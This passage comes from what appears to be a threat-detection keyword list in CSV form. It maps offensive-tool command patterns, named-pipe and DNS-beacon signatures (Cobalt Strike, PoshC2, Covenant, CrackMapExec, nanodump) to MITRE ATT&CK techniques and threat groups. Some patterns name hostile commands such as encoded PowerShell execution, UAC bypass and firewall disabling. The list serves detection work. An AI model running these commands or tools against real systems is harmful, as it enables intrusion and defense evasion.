Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\UIA_PIPE*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\win\msrpc_*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\winsock*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\Winsock2\CatalogChangeListener-*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\wkssvc_*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\adhunt.py","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","0","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"\jaccdpqnvbrrxlaf*","offensive_tool_keyword","poshc2","pipe name from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","pipe names (sysmon EID 17 - 18)","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"\kali-linux-2023*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. 
Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"\NtRemoteLoad.exe*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"\Posh*","offensive_tool_keyword","poshc2","pipe name from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","pipe names (sysmon EID 17 - 18)","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"afrog -*","offensive_tool_keyword","afrog","A tool for finding vulnerabilities","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/zan8in/afrog","1","0","N/A","N/A","10","2135","272","2023-09-28T09:41:46Z","2022-02-24T06:00:32Z" +"BypassUAC *","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"capinfos 
-*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"captype -*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"cd PayGen","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","0","N/A","N/A",,"N/A",,, +"certipy *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"chkconfig off ip6tables","greyware_tool_keyword","iptables","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"chkconfig off iptables","greyware_tool_keyword","iptables","Adversaries may disable security tools to avoid possible detection of their tools and activities. 
This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc *","greyware_tool_keyword","powershell","Jenkins Abuse Without admin access","T1210.002 - T1078.003 - T1046","TA0001 - TA0007 - TA0040","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"cme smb *","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"cme smb -*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"cme winrm *","offensive_tool_keyword","crackmapexec","crackmapexec command lines. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"dcenum *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"delete_file *.dll","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"detect-hooks","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","0","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" +"doc.1a.*\.*","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" +"doc.4a.*\.*","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" +"doc.bc.*\.*","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" +"doc.md.*\.*","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" +"doc.po.*\.*","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query 
field","10","10","N/A","N/A","N/A","N/A" +"doc.tx.*\.*","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" +"doc-stg-prepend*.*","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" +"doc-stg-sh*.*","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" +"dumpwifi 
*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 